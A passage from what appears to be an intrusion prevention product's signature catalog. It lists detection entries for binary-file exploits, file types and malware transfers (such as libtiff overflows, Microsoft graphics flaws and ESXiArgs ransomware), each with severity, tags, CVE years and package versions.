Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write
Description:
Back to top

File-Binary_Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1801-5242
Vulnerability: Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write
Description:
Back to top

File-Binary_Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write
Description:
Back to top

File-Binary_LhArc-Archive

About this situation: LhArc archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, LhArc, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Libav-LZO-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Libav Team libav detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libav, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Libav-LZO-Integer-Overflow
Description:
Back to top

File-Binary_Libextractor-ASF-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the GNU libextractor detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libextractor, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Libextractor-Multiple-Heap-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-Binary_Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FLAC Project libFLAC detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libflac, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-442-4219
Vulnerability: Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow
Description:
Back to top

File-Binary_Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One

About this situation: An attempt to exploit a vulnerability in the libmspack library detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, cabextract, libmspack, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1116-5242
Vulnerability: Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One
Description:
Back to top

File-Binary_Libsndfile-PAF-File-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in the libsndfile library detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libsndfile, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Libsndfile-PAF-File-Integer-Overflow
Description:
Back to top

File-Binary_Libtiff-Jbigdecode-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in libtiff libtiff detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libtiff, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Libtiff-Jbigdecode-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in libtiff libtiff detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libtiff, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Linux-Esxiargs-Ransomware

About this situation: A transfer of ESXiArgs ransomware detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ESXiArgs Ransomware, Any Operating System not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Vulnerability: Linux-Esxiargs-Ransomware
Description:
Back to top

File-Binary_Lotus-1-2-3-Spreadsheet

About this situation: Lotus 1-2-3 spreadsheet download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Lotus 1-2-3, Any Operating System not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Notes detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Lupper-Worm-Download

About this situation: Lupper worm download
Context: Other Binary File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, CVE2005, Any Operating System not specific, Successful Attacks, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-407-4219
Vulnerability: HTTP-Awstats-Configdir-Parameter-System-Compromise
Description:
Back to top

File-Binary_Lz4-Archive

About this situation: lz4 archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, lz4, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-759-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow

About this situation: An attempt to exploit in Mac OS X detected
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow
Description:
Back to top

File-Binary_Mach-O-Executable-File-Transfer

About this situation: Executable file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

File-Binary_Malicious-BMP-File-CVE-2009-2518

About this situation: A malicious BMP file targeting CVE-2009-2518 over HTTP detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, MS2009-10, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Office-BMP-Integer-Overflow-CVE-2009-2518
Description:
Back to top

File-Binary_Malicious-Ico-File-Used-By-Trojans

About this situation: A malicious .ico file used by trojanized 3CX VOIP application detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1574-5242
Last changed: sgpkg-ips-1575-5242
Vulnerability: Malicious-Ico-File-Used-By-Trojans
Description:
Back to top

File-Binary_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-03, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1847-5242
Last changed: sgpkg-ips-1847-5242
Vulnerability: Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
Description:
Back to top

File-Binary_Matroska-Media-Container

About this situation: Matroska Media Container file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in McAfee ePolicy Orchestrator detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee ePolicy Orchestrator, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1128-5242
Vulnerability: McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection
Description:
Back to top

File-Binary_McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in McAfee Active Mail Protection detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee VirusScan Enterprise, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1611-5242
Vulnerability: McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling

About this situation: An attempt to exploit a vulnerability in McAfee VirusScan Enterprise detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, McAfee VirusScan Enterprise, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling
Description:
Back to top

File-Binary_Microsoft-Access-CVE-2013-3155

About this situation: A suspicious binary file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Binary_Microsoft-Access-CVE-2013-3156

About this situation: A suspicious binary file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Binary_Microsoft-Access-CVE-2013-3157-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Access detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, Microsoft Office Access, MS2013-02, CVE2013, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Vulnerability: Microsoft-Access-CVE-2013-3157-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-ASF-Container

About this situation: Microsoft ASF container file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows Media Services, Windows not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-ATL-COM-Initialization

About this situation: An attempt to exploit a vulnerability in Microsoft Active Template Library detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-ATL-COM-Initialization
Description:
Back to top

File-Binary_Microsoft-Cabinet-Transfer

About this situation: Cabinet archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Cabinet-Archive-File-Transfer
File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow

About this situation: Malicious CHM file detected, possible system compromise
Context: Other Binary File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, Microsoft Outlook, Microsoft Outlook Express, MS2005-06, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: CHM-Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Embedded-Font-EOT-File-Reference

About this situation: Reference to EOT file in embedded font definition
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2006-01, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Microsoft-Embedded-Web-Font-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Embedded OpenType Font Engine detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2009-07, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
Description:
Back to top

File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Embedded OpenType Font Engine detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2009-07, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Excel-Heap-Corruption-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-09, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Excel-Heap-Corruption-Vulnerability
Description:
Back to top

File-Binary_Microsoft-Excel-Legacy-Spreadsheet

About this situation: Microsoft Excel legacy spreadsheet download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Excel, Windows not specific, Microsoft Excel not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2006-03, CVE2006, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Excel-Workspace-Index-Value-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2007-08, CVE2007, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Excel-Workspace-Index-Value-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow

About this situation: Buffer overflow exploit against Microsoft Exchange TNEF decoding vulnerability
Context: Other Binary File Stream
Severity: 7
Tags: Windows, x86, Exchange Server 2003, Exchange Server 2000, Exchange Server 2007, MS2009-02, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Exchange-TNEF-Buffer-Overflow-MS09-003
Description:
Back to top

File-Binary_Microsoft-Graphics-Component-Createcolorspace-Information-Disclosure2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-05, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Vulnerability: Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-05, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1684-5242
Vulnerability: Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-764-5211
Vulnerability: Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Component-CVE-2017-0025

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Graphics-Component-CVE-2017-0025
Description:
Back to top

File-Binary_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-08, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1691-5242
Last changed: sgpkg-ips-1691-5242
Vulnerability: Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-10, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-812-5242
Vulnerability: Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-08, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1693-5242
Last changed: sgpkg-ips-1693-5242
Vulnerability: Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1695-5242
Vulnerability: Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616
Description:
Back to top

File-Binary_Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1172-5242
Vulnerability: Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010

About this situation: An attempt to exploit a vulnerability in Microsoft Windows was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1057-5242
Vulnerability: Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010
Description:
Back to top

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012

About this situation: An attempt to exploit a vulnerability in Microsoft Windows was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1057-5242
Vulnerability: Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012
Description:
Back to top

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013

About this situation: An attempt to exploit a vulnerability in Microsoft Windows was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1057-5242
Vulnerability: Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013
Description:
Back to top

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1015

About this situation: An attempt to exploit a vulnerability in Microsoft Windows was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1057-5242
Vulnerability: Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1015
Description:
Back to top

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1016

About this situation: An attempt to exploit a vulnerability in Microsoft Windows was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1057-5242
Vulnerability: Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1016
Description:
Back to top

File-Binary_Microsoft-Hyper-V-Disk-Image

About this situation: Microsoft Hyper-V virtual disk image file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Hyper-V, Windows not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, MS2007-08, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Jet-Db-Engine-Buffer-Overflow

About this situation: Crafted mdb file detected. Possible exploit against a vulnerability in Microsoft Jet database engine.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Jet Database Engine, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Microsoft-Jet-Db-Engine-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2018-04, CVE2018, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1066-5242
Last changed: sgpkg-ips-1066-5242
Vulnerability: Microsoft-MsMpEng-Remote-Code-Execution-Vulnerability-CVE-2018-0986
Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Silverlight detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-12, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1036-5242
